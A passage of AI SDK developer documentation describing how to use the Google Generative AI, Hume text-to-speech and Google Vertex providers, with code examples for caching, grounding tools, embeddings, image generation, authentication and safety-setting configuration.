// Second request with same prefix - eligible for cache hit
const { text: meatLasagna, providerMetadata } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a meat lasagna recipe for 12 people.`,
});

// Check cached token count in usage metadata
console.log('Cached tokens:', providerMetadata.google);
// e.g.
// {
//   groundingMetadata: null,
//   safetyRatings: null,
//   usageMetadata: {
//     cachedContentTokenCount: 2027,
//     thoughtsTokenCount: 702,
//     promptTokenCount: 2152,
//     candidatesTokenCount: 710,
//     totalTokenCount: 3564
//   }
// }

Explicit Caching

For guaranteed cost savings, you can still use explicit caching with Gemini 2.5 and 2.0 models. See the models page to check if caching is supported for the used model:

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleGenAI } from '@google/genai';
import { generateText } from 'ai';

const ai = new GoogleGenAI({
  apiKey: process.env.GOOGLE_GENERATIVE_AI_API_KEY,
});

const model = 'gemini-2.5-pro';

// Create a cache with the content you want to reuse
const cache = await ai.caches.create({
  model,
  config: {
    contents: [
      {
        role: 'user',
        parts: [{ text: '1000 Lasagna Recipes...' }],
      },
    ],
    ttl: '300s', // Cache expires after 5 minutes
  },
});

const { text: veggieLasagnaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  providerOptions: {
    google: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

const { text: meatLasagnaRecipe } = await generateText({
  model: google(model),
  prompt: 'Write a meat lasagna recipe for 12 people.',
  providerOptions: {
    google: {
      cachedContent: cache.name,
    } satisfies GoogleLanguageModelOptions,
  },
});

Code Execution

With Code Execution, certain models can generate and execute Python code to perform calculations, solve problems, or provide more accurate information.

You can enable code execution by adding the code_execution tool to your request.

import { google } from '@ai-sdk/google';
import { googleTools } from '@ai-sdk/google/internal';
import { generateText } from 'ai';

const { text, toolCalls, toolResults } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: { code_execution: google.tools.codeExecution({}) },
  prompt: 'Use python to calculate the 20th fibonacci number.',
});

The response will contain the tool calls and results from the code execution.

Google Search

With Google Search grounding, the model has access to the latest information using Google Search.

import { google } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_search: google.tools.googleSearch({}),
  },
  prompt:
    'List the top 5 San Francisco news from the past week.' +
    'You must include the date of each article.',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

The googleSearch tool accepts the following optional configuration options:

searchTypes object

Enables specific search types. Both can be combined.
- webSearch: Enable web search grounding (pass {} to enable). This is the default.
- imageSearch: Enable image search grounding (pass {} to enable).
timeRangeFilter object

Restricts search results to a specific time range. Both startTime and endTime are required.
- startTime: Start time in ISO 8601 format (e.g. '2025-01-01T00:00:00Z').
- endTime: End time in ISO 8601 format (e.g. '2025-12-31T23:59:59Z').

google.tools.googleSearch({
  searchTypes: { webSearch: {} },
  timeRangeFilter: {
    startTime: '2025-01-01T00:00:00Z',
    endTime: '2025-12-31T23:59:59Z',
  },
});

When Google Search grounding is enabled, the model will include sources in the response.

Additionally, the grounding metadata includes detailed information about how search results were used to ground the model's response. Here are the available fields:

webSearchQueries (string[] | null)
- Array of search queries used to retrieve information
- Example: ["What's the weather in Chicago this weekend?"]
searchEntryPoint ({ renderedContent: string } | null)
- Contains the main search result content used as an entry point
- The renderedContent field contains the formatted content
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by search results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting search result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "webSearchQueries": ["What's the weather in Chicago this weekend?"],
    "searchEntryPoint": {
      "renderedContent": "..."
    },
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 65,
          "text": "Chicago weather changes rapidly, so layers let you adjust easily."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.99]
      }
    ]
  }
}

Enterprise Web Search

With Enterprise Web Search, the model has access to a compliance-focused web index designed for highly-regulated industries such as finance, healthcare, and public sector.

import { createVertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
});

const { text, sources, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    enterprise_web_search: vertex.tools.enterpriseWebSearch({}),
  },
  prompt: 'What are the latest regulatory updates for financial services?',
});

Enterprise Web Search provides the following benefits:

Does not log customer data
Supports VPC service controls
Compliance-focused web index for regulated industries

File Search

The File Search tool lets Gemini retrieve context from your own documents that you have indexed in File Search stores. Only Gemini 2.5 and Gemini 3 models support this feature.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources } = await generateText({
  model: google('gemini-2.5-pro'),
  tools: {
    file_search: google.tools.fileSearch({
      fileSearchStoreNames: [
        'projects/my-project/locations/us/fileSearchStores/my-store',
      ],
      metadataFilter: 'author = "Robert Graves"',
      topK: 8,
    }),
  },
  prompt: "Summarise the key themes of 'I, Claudius'.",
});

File Search responses include citations via the normal sources field and expose raw grounding metadata in providerMetadata.google.groundingMetadata.

URL Context

Google provides a provider-defined URL context tool.

The URL context tool allows you to provide specific URLs that you want the model to analyze directly in from the prompt.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on the document: https://ai.google.dev/gemini-api/docs/url-context.
          Answer this question: How many links we can consume in one request?`,
  tools: {
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

The URL context metadata includes detailed information about how the model used the URL context to generate the response. Here are the available fields:

urlMetadata ({ retrievedUrl: string; urlRetrievalStatus: string; }[] | null)
- Array of URL context metadata
- Each object includes:
  - retrievedUrl: The URL of the context
  - urlRetrievalStatus: The status of the URL retrieval

Example response:

{
  "urlMetadata": [
    {
      "retrievedUrl": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
      "urlRetrievalStatus": "URL_RETRIEVAL_STATUS_SUCCESS"
    }
  ]
}

With the URL context tool, you will also get the groundingMetadata.

"groundingMetadata": {
    "groundingChunks": [
        {
            "web": {
                "uri": "https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai",
                "title": "Google Generative AI - AI SDK Providers"
            }
        }
    ],
    "groundingSupports": [
        {
            "segment": {
                "startIndex": 67,
                "endIndex": 157,
                "text": "**Installation**: Install the `@ai-sdk/google` module using your preferred package manager"
            },
            "groundingChunkIndices": [
                0
            ]
        },
    ]
}

You can add up to 20 URLs per request.

Combine URL Context with Search Grounding

You can combine the URL context tool with search grounding to provide the model with the latest information from the web.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: `Based on this context: https://ai-sdk.dev/providers/ai-sdk-providers/google-generative-ai, tell me how to use Gemini with AI SDK.
    Also, provide the latest news about AI SDK V5.`,
  tools: {
    google_search: google.tools.googleSearch({}),
    url_context: google.tools.urlContext({}),
  },
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const urlContextMetadata = metadata?.urlContextMetadata;

Google Maps Grounding

With Google Maps grounding, the model has access to Google Maps data for location-aware responses. This enables providing local data and geospatial context, such as finding nearby restaurants.

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text, sources, providerMetadata } = await generateText({
  model: google('gemini-2.5-flash'),
  tools: {
    google_maps: google.tools.googleMaps({}),
  },
  providerOptions: {
    google: {
      retrievalConfig: {
        latLng: { latitude: 34.090199, longitude: -117.881081 },
      },
    } satisfies GoogleLanguageModelOptions,
  },
  prompt:
    'What are the best Italian restaurants within a 15-minute walk from here?',
});

const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;

When Google Maps grounding is enabled, the model's response will include sources pointing to Google Maps URLs. The grounding metadata includes maps chunks with place information:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "maps": {
          "uri": "https://maps.google.com/?cid=12345",
          "title": "Restaurant Name",
          "placeId": "places/ChIJ..."
        }
      }
    ]
  }
}

Google Maps grounding is supported on Gemini 2.0 and newer models.

RAG Engine Grounding

With RAG Engine Grounding, the model has access to your custom knowledge base using the Vertex RAG Engine. This enables the model to provide answers based on your specific data sources and documents.

import { createVertex } from '@ai-sdk/google-vertex';
import { GoogleGenerativeAIProviderMetadata } from '@ai-sdk/google';
import { generateText } from 'ai';

const vertex = createVertex({
  project: 'my-project',
  location: 'us-central1',
});

const { text, sources, providerMetadata } = await generateText({
  model: vertex('gemini-2.5-flash'),
  tools: {
    vertex_rag_store: vertex.tools.vertexRagStore({
      ragCorpus:
        'projects/my-project/locations/us-central1/ragCorpora/my-rag-corpus',
      topK: 5,
    }),
  },
  prompt:
    'What are the key features of our product according to our documentation?',
});

// access the grounding metadata. Casting to the provider metadata type
// is optional but provides autocomplete and type safety.
const metadata = providerMetadata?.google as
  | GoogleGenerativeAIProviderMetadata
  | undefined;
const groundingMetadata = metadata?.groundingMetadata;
const safetyRatings = metadata?.safetyRatings;

When RAG Engine Grounding is enabled, the model will include sources from your RAG corpus in the response.

Additionally, the grounding metadata includes detailed information about how RAG results were used to ground the model's response. Here are the available fields:

groundingChunks (Array of chunk objects | null)
- Contains the retrieved context chunks from your RAG corpus
- Each chunk includes:
  - retrievedContext: Information about the retrieved context
    - uri: The URI or identifier of the source document
    - title: The title of the source document (optional)
    - text: The actual text content of the chunk
groundingSupports (Array of support objects | null)
- Contains details about how specific response parts are supported by RAG results
- Each support object includes:
  - segment: Information about the grounded text segment
    - text: The actual text segment
    - startIndex: Starting position in the response
    - endIndex: Ending position in the response
  - groundingChunkIndices: References to supporting RAG result chunks
  - confidenceScores: Confidence scores (0-1) for each supporting chunk

Example response:

{
  "groundingMetadata": {
    "groundingChunks": [
      {
        "retrievedContext": {
          "uri": "gs://my-bucket/docs/product-guide.pdf",
          "title": "Product User Guide",
          "text": "Our product includes advanced AI capabilities, real-time processing, and enterprise-grade security features."
        }
      }
    ],
    "groundingSupports": [
      {
        "segment": {
          "startIndex": 0,
          "endIndex": 45,
          "text": "Our product includes advanced AI capabilities and real-time processing."
        },
        "groundingChunkIndices": [0],
        "confidenceScores": [0.95]
      }
    ]
  }
}

Configuration Options

The vertexRagStore tool accepts the following configuration options:

ragCorpus (string, required)
- The RagCorpus resource name in the format: projects/{project}/locations/{location}/ragCorpora/{rag_corpus}
- This identifies your specific RAG corpus to search against
topK (number, optional)
- The number of top contexts to retrieve from your RAG corpus
- Defaults to the corpus configuration if not specified

Image Outputs

Gemini models with image generation capabilities (e.g. gemini-2.5-flash-image) support generating images as part of a multimodal response. Images are exposed as files in the response.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash-image'),
  prompt:
    'Create a picture of a nano banana dish in a fancy restaurant with a Gemini theme',
});

for (const file of result.files) {
  if (file.mediaType.startsWith('image/')) {
    console.log('Generated image:', file);
  }
}

Safety Ratings

The safety ratings provide insight into the safety of the model's response. See Google AI documentation on safety settings.

Example response excerpt:

{
  "safetyRatings": [
    {
      "category": "HARM_CATEGORY_HATE_SPEECH",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11027937,
      "severity": "HARM_SEVERITY_LOW",
      "severityScore": 0.28487435
    },
    {
      "category": "HARM_CATEGORY_DANGEROUS_CONTENT",
      "probability": "HIGH",
      "blocked": true,
      "probabilityScore": 0.95422274,
      "severity": "HARM_SEVERITY_MEDIUM",
      "severityScore": 0.43398145
    },
    {
      "category": "HARM_CATEGORY_HARASSMENT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.11085559,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.19027223
    },
    {
      "category": "HARM_CATEGORY_SEXUALLY_EXPLICIT",
      "probability": "NEGLIGIBLE",
      "probabilityScore": 0.22901751,
      "severity": "HARM_SEVERITY_NEGLIGIBLE",
      "severityScore": 0.09089675
    }
  ]
}

Troubleshooting

Schema Limitations

The Google Generative AI API uses a subset of the OpenAPI 3.0 schema, which does not support features such as unions. The errors that you get in this case look like this:

GenerateContentRequest.generation_config.response_schema.properties[occupation].type: must be specified

By default, structured outputs are enabled (and for tool calling they are required). You can disable structured outputs for object generation as a workaround:

const { output } = await generateText({
  model: google('gemini-2.5-flash'),
  providerOptions: {
    google: {
      structuredOutputs: false,
    } satisfies GoogleLanguageModelOptions,
  },
  output: Output.object({
    schema: z.object({
      name: z.string(),
      age: z.number(),
      contact: z.union([
        z.object({
          type: z.literal('email'),
          value: z.string(),
        }),
        z.object({
          type: z.literal('phone'),
          value: z.string(),
        }),
      ]),
    }),
  }),
  prompt: 'Generate an example person for testing.',
});

The following Zod features are known to not work with Google Generative AI:

z.union
z.record

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming	Google Search	URL Context
`gemini-3.1-pro-preview`
`gemini-3.1-flash-image-preview`
`gemini-3.1-flash-lite-preview`
`gemini-3-pro-preview`
`gemini-3-pro-image-preview`
`gemini-3-flash-preview`
`gemini-2.5-pro`
`gemini-2.5-flash`
`gemini-2.5-flash-lite`
`gemini-2.5-flash-lite-preview-06-17`
`gemini-2.0-flash`

Gemma Models

You can use Gemma models with the Google Generative AI API. The following Gemma models are available:

gemma-3-27b-it
gemma-3-12b-it

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemma-3-27b-it'),
  system: 'You are a helpful assistant that responds concisely.',
  prompt: 'What is machine learning?',
});

The system instruction is automatically formatted and included in the conversation, so Gemma models can follow the guidance without any additional configuration.

Embedding Models

You can create models that call the Google Generative AI embeddings API using the .embedding() factory method.

const model = google.embedding('gemini-embedding-001');

The Google Generative AI provider sends API calls to the right endpoint based on the type of embedding:

Single embeddings: When embedding a single value with embed(), the provider uses the single :embedContent endpoint, which typically has higher rate limits compared to the batch endpoint.
Batch embeddings: When embedding multiple values with embedMany() or multiple values in embed(), the provider uses the :batchEmbedContents endpoint.

Google Generative AI embedding models support additional settings. You can pass them as an options argument:

import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embed } from 'ai';

const model = google.embedding('gemini-embedding-001');

const { embedding } = await embed({
  model,
  value: 'sunny day at the beach',
  providerOptions: {
    google: {
      outputDimensionality: 512, // optional, number of dimensions for the embedding
      taskType: 'SEMANTIC_SIMILARITY', // optional, specifies the task type for generating embeddings
      content: [[{ text: 'additional context' }]], // optional, per-value multimodal content (only 1 here, since `value` is only a single one)
    } satisfies GoogleEmbeddingModelOptions,
  },
});

When using embedMany, provide per-value multimodal content via the content option. Each entry corresponds to a value at the same index; use null for text-only entries:

import { google, type GoogleEmbeddingModelOptions } from '@ai-sdk/google';
import { embedMany } from 'ai';

const { embeddings } = await embedMany({
  model: google.embedding('gemini-embedding-2-preview'),
  values: ['sunny day at the beach', 'rainy afternoon in the city'],
  providerOptions: {
    google: {
      // content array must have the same length as values
      content: [
        [{ inlineData: { mimeType: 'image/png', data: '<base64>' } }], // pairs with values[0]
        null, // text-only, pairs with values[1]
      ],
    } satisfies GoogleEmbeddingModelOptions,
  },
});

The following optional provider options are available for Google Generative AI embedding models:

outputDimensionality: number

Optional reduced dimension for the output embedding. If set, excessive values in the output embedding are truncated from the end.
taskType: string

Optional. Specifies the task type for generating embeddings. Supported task types include:
- SEMANTIC_SIMILARITY: Optimized for text similarity.
- CLASSIFICATION: Optimized for text classification.
- CLUSTERING: Optimized for clustering texts based on similarity.
- RETRIEVAL_DOCUMENT: Optimized for document retrieval.
- RETRIEVAL_QUERY: Optimized for query-based retrieval.
- QUESTION_ANSWERING: Optimized for answering questions.
- FACT_VERIFICATION: Optimized for verifying factual information.
- CODE_RETRIEVAL_QUERY: Optimized for retrieving code blocks based on natural language queries.
content: array

Optional. Per-value multimodal content parts for embedding non-text content (images, video, PDF, audio). Each entry corresponds to the embedding value at the same index — its parts are merged with the text value in the request. Use null for entries that are text-only. The array length must match the number of values being embedded. Each non-null entry is an array of parts, where each part can be either { text: string } or { inlineData: { mimeType: string, data: string } }. Supported by gemini-embedding-2-preview.

Model Capabilities

Model	Default Dimensions	Custom Dimensions	Multimodal
`gemini-embedding-001`	3072
`gemini-embedding-2-preview`	3072

Image Models

You can create image models that call the Google Generative AI API using the .image() factory method. For more on image generation with the AI SDK see generateImage().

The Google provider supports two types of image models:

Imagen models: Dedicated image generation models using the :predict API
Gemini image models: Multimodal language models with image output capabilities using the :generateContent API

Imagen Models

Imagen models are dedicated image generation models.

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Further configuration can be done using Google provider options. You can validate the provider options using the GoogleImageModelOptions type.

import { google } from '@ai-sdk/google';
import { GoogleImageModelOptions } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('imagen-4.0-generate-001'),
  providerOptions: {
    google: {
      personGeneration: 'dont_allow',
    } satisfies GoogleImageModelOptions,
  },
  // ...
});

The following provider options are available for Imagen models:

personGeneration allow_adult | allow_all | dont_allow Whether to allow person generation. Defaults to allow_adult.

Imagen Model Capabilities

Model	Aspect Ratios
`imagen-4.0-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-ultra-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9
`imagen-4.0-fast-generate-001`	1:1, 3:4, 4:3, 9:16, 16:9

Gemini Image Models

Gemini image models (e.g. gemini-2.5-flash-image) are technically multimodal output language models, but they can be used with the generateImage() function for a simpler image generation experience. Internally, the provider calls the language model API with responseModalities: ['IMAGE'].

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: 'A photorealistic image of a cat wearing a wizard hat',
  aspectRatio: '1:1',
});

Gemini image models also support image editing by providing input images:

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';
import fs from 'node:fs';

const sourceImage = fs.readFileSync('./cat.png');

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: [sourceImage],
  },
});

You can also use URLs for input images:

import { google } from '@ai-sdk/google';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: google.image('gemini-2.5-flash-image'),
  prompt: {
    text: 'Add a small wizard hat to this cat',
    images: ['https://example.com/cat.png'],
  },
});

Gemini Image Model Capabilities

Model	Image Generation	Image Editing	Aspect Ratios
`gemini-2.5-flash-image`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3-pro-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9
`gemini-3.1-flash-image-preview`			1:1, 2:3, 3:2, 3:4, 4:3, 4:5, 5:4, 9:16, 16:9, 21:9

title: Hume description: Learn how to use the Hume provider for the AI SDK.

Hume Provider

The Hume provider contains support for the Hume text-to-speech (TTS) API.

Setup

The Hume provider is available in the @ai-sdk/hume module. You can install it with

Provider Instance

You can import the default provider instance hume from @ai-sdk/hume:

import { hume } from '@ai-sdk/hume';

If you need a customized setup, you can import createHume from @ai-sdk/hume and create a provider instance with your settings:

import { createHume } from '@ai-sdk/hume';

const hume = createHume({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Hume provider instance:

apiKey string

API key that is being sent using the X-Hume-Api-Key header. It defaults to the HUME_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Hume speech API using the .speech() factory method.

const model = hume.speech();

You can pass standard speech generation options like voice, speed, instructions, and outputFormat:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  voice: 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453',
  speed: 1.0,
  instructions: 'Speak in a friendly, conversational tone.',
  outputFormat: 'mp3',
});

Supported Parameters

text string (required)

The text to convert to speech.
voice string

The voice ID to use for the generated audio. Defaults to 'd8ab67c6-953d-4bd8-9370-8fa53a0f1453'.
speed number

Speech rate multiplier.
instructions string

Description or instructions for how the text should be spoken.
outputFormat string

The audio format to generate. Supported values: 'mp3', 'pcm', 'wav'. Defaults to 'mp3'.

Provider Options

You can pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { hume } from '@ai-sdk/hume';
import { type HumeSpeechModelOptions } from '@ai-sdk/hume';

const result = await generateSpeech({
  model: hume.speech(),
  text: 'Hello, world!',
  providerOptions: {
    hume: {
      context: {
        generationId: 'previous-generation-id',
      },
    } satisfies HumeSpeechModelOptions,
  },
});

The following provider options are available:

context object

Context for the speech synthesis request. Can be either:
- { generationId: string } - ID of a previously generated speech synthesis to use as context.
- { utterances: Utterance[] } - An array of utterance objects for context, where each utterance has:
  - text string (required) - The text content.
  - description string - Instructions for how the text should be spoken.
  - speed number - Speech rate multiplier.
  - trailingSilence number - Duration of silence to add after the utterance in seconds.
  - voice object - Voice configuration, either { id: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' } or { name: string, provider?: 'HUME_AI' | 'CUSTOM_VOICE' }.

Model Capabilities

Model	Instructions	Speed	Output Formats
`default`			mp3, pcm, wav

title: Google Vertex AI description: Learn how to use the Google Vertex AI provider.

Google Vertex Provider

Setup

The Google Vertex and Google Vertex Anthropic providers are both available in the @ai-sdk/google-vertex module. You can install it with

Google Vertex Provider Usage

Provider Instance

You can import the default provider instance vertex from @ai-sdk/google-vertex:

import { vertex } from '@ai-sdk/google-vertex';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

Google Vertex supports multiple authentication methods depending on your runtime environment and requirements.

Node.js Runtime

If you want to customize the Google authentication options you can pass them as options to the createVertex function, for example:

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  googleAuthOptions: {
    credentials: {
      client_email: 'my-email',
      private_key: 'my-private-key',
    },
  },
});

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleAuthOptions object

Optional. The Authentication options used by the Google Auth Library. See also the GoogleAuthOptions interface.
- authClient object An AuthClient to use.
- keyFilename string Path to a .json, .pem, or .p12 key file.
- keyFile string Path to a .json, .pem, or .p12 key file.
- credentials object Object containing client_email and private_key properties, or the external account client options.
- clientOptions object Options object passed to the constructor of the client.
- scopes string | string[] Required scopes for the desired API request.
- projectId string Your project ID.
- universeDomain string The default service domain for a given Cloud universe.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
baseURL string

Optional. Base URL for the Google Vertex API calls e.g. to use proxy servers. By default, it is constructed using the location and project: https://${location}-aiplatform.googleapis.com/v1/projects/${project}/locations/${location}/publishers/google

Edge Runtime

You can import the default provider instance vertex from @ai-sdk/google-vertex/edge:

import { vertex } from '@ai-sdk/google-vertex/edge';

If you need a customized setup, you can import createVertex from @ai-sdk/google-vertex/edge and create a provider instance with your settings:

import { createVertex } from '@ai-sdk/google-vertex/edge';

const vertex = createVertex({
  project: 'my-project', // optional
  location: 'us-central1', // optional
});

For Edge runtime authentication, you'll need to set these environment variables from your Google Default Application Credentials JSON file:

GOOGLE_CLIENT_EMAIL
GOOGLE_PRIVATE_KEY
GOOGLE_PRIVATE_KEY_ID (optional)

These values can be obtained from a service account JSON file from the Google Cloud Console.

Optional Provider Settings

You can use the following optional settings to customize the provider instance:

project string

The Google Cloud project ID that you want to use for the API calls. It uses the GOOGLE_VERTEX_PROJECT environment variable by default.
location string

The Google Cloud location that you want to use for the API calls, e.g. us-central1. It uses the GOOGLE_VERTEX_LOCATION environment variable by default.
googleCredentials object

Optional. The credentials used by the Edge provider for authentication. These credentials are typically set through environment variables and are derived from a service account JSON file.
- clientEmail string The client email from the service account JSON file. Defaults to the contents of the GOOGLE_CLIENT_EMAIL environment variable.
- privateKey string The private key from the service account JSON file. Defaults to the contents of the GOOGLE_PRIVATE_KEY environment variable.
- privateKeyId string The private key ID from the service account JSON file (optional). Defaults to the contents of the GOOGLE_PRIVATE_KEY_ID environment variable.
headers Resolvable<Record<string, string | undefined>>

Headers to include in the requests. Can be provided in multiple formats:
- A record of header key-value pairs: Record<string, string | undefined>
- A function that returns headers: () => Record<string, string | undefined>
- An async function that returns headers: async () => Record<string, string | undefined>
- A promise that resolves to headers: Promise<Record<string, string | undefined>>
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Express Mode

Express mode provides a simplified authentication method using an API key instead of OAuth or service account credentials. When using express mode, the project and location settings are not required.

import { createVertex } from '@ai-sdk/google-vertex';

const vertex = createVertex({
  apiKey: process.env.GOOGLE_VERTEX_API_KEY,
});

Optional Provider Settings

apiKey string

The API key for Google Vertex AI. When provided, the provider uses express mode with API key authentication instead of OAuth. It uses the GOOGLE_VERTEX_API_KEY environment variable by default.

Language Models

You can create models that call the Vertex API using the provider instance. The first argument is the model id, e.g. gemini-2.5-pro.

const model = vertex('gemini-2.5-pro');

Google Vertex models support also some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { vertex } from '@ai-sdk/google-vertex';
import { type GoogleLanguageModelOptions } from '@ai-sdk/google';

const model = vertex('gemini-2.5-pro');

await generateText({
  model,
  providerOptions: {
    vertex: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    } satisfies GoogleLanguageModelOptions,
  },
});

The following optional provider options are available for Google Vertex models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: projects/{project}/locations/{location}/cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Vertex uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
audioTimestamp boolean

Optional. Enables timestamp understanding for audio files. Defaults to false.

This is useful for generating transcripts with accurate timestamps. Consult Google's Documentation for usage details.
labels object

Optional. Defines labels used in billing reports.

Consult Google's Documentation for usage details.
streamFunctionCallArguments boolean

Optional. When set to true, function call arguments will be streamed incrementally in streaming responses. This enables tool-input-delta events to arrive as the model generates function call arguments, reducing perceived latency for tool calls. Defaults to false. Only supported on the Vertex AI API (not the Gemini API) with Gemini 3+ models.

Consult Google's Documentation for details.

You can use Google Vertex language models to generate text with the generateText function:

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const { text } = await generateText({
  model: vertex('gemini-2.5-pro'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Vertex language models can also be used in the streamText function (see AI SDK Core).

Code Execution

You can enable code execution by adding the code_execution tool to your request.

import { vertex } from '@ai-sdk/google-vertex';
import { generateText } from 'ai';

const result = await generateText({
  model: vertex('gemini-2.5-pro'),
  tools: { code_execution: vertex.tools.codeExecution({}) },
  prompt:
    'Use python to calculate 20th fibonacci number. Then find the nearest palindrome to it.',
});

The response will contain tool-call and tool-result parts for the executed code.

URL Context

